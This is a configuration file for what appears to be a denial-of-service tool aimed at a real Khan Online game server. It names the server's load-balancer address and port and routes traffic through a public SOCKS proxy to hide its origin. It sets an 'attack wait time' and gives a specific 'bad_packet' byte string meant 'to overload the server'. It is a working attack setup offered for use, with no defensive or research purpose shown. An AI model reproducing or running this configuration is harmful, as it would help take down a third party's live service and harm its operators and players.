# False = use this config file as version information.
# True  = copy GameData.bin and KhanClient.exe to this folder from khan folder. 
use_client_version : false

# Leave empty if you won't use a proxy
# Set to a SOCKS4/5 proxy if you want to use a proxy.
# http://www.gatherproxy.com/sockslist/country/?c=Thailand
# https://freevpn.ninja/free-proxy/country/th
proxy : 180.183.105.7:1080
# Set to 4 for SOCKS4
# Set to 5 for SOCKS5
proxy_version : 5

# This is the ip:port of the balancing server NOT THE GATE.
# To get the balancing ip:port open the KhanClient.exe with a hex editor and look for the domain/ip.
# The default port is 2112.
connection : lb.anachakkhan.com:2112

# This is the version of the KhanClient.exe.
game_client_version  : 35

# This is the version of the Upgrade.exe.
game_upgrade_version : 13

# This is the version of the Data/ folder and is the one that is incremented most of the time.
game_data_version    : 515

# Attack wait time. (seconds)
wait : 5

# This will be the packet/payload to overload the server with
bad_packet : 05 00 00 00 00 00 00 00 00

# for dev
# env GOOS=windows GOARCH=386 go build -i -o khxn32.exe main.go
# go build -i -o khxn.exe main.go
debug   : false
verbose : false